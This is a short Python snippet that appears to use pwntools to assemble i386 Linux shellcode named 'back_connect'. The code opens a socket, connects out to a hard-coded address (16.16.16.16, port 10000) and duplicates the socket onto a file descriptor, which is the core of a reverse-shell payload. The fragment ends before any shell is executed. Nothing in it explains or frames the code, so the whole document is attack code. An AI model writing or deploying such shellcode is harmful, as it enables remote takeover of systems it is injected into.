back_connect = asm('\n'.join([
    'xor eax, eax',
    'xor ebx, ebx',
    'xor ecx, ecx',
    'xor edx, edx',
    'mov bl, 2',
    'inc ecx',
    'mov ax, 0x167',
    'int 0x80',
    'push eax',
    'pop ebx',   
    'mov dl, 16',       
    'push 0x10101010',
    'push 0x10270002',
    'push esp',
    'pop ecx',
    'mov ax, 0x16a',
    'int 0x80',
    'xor ecx, ecx',
    'inc ecx',
    'xor eax, eax',
    'mov al, 0x3f',
    'int 0x80'
]), arch = 'i386', os = 'linux')
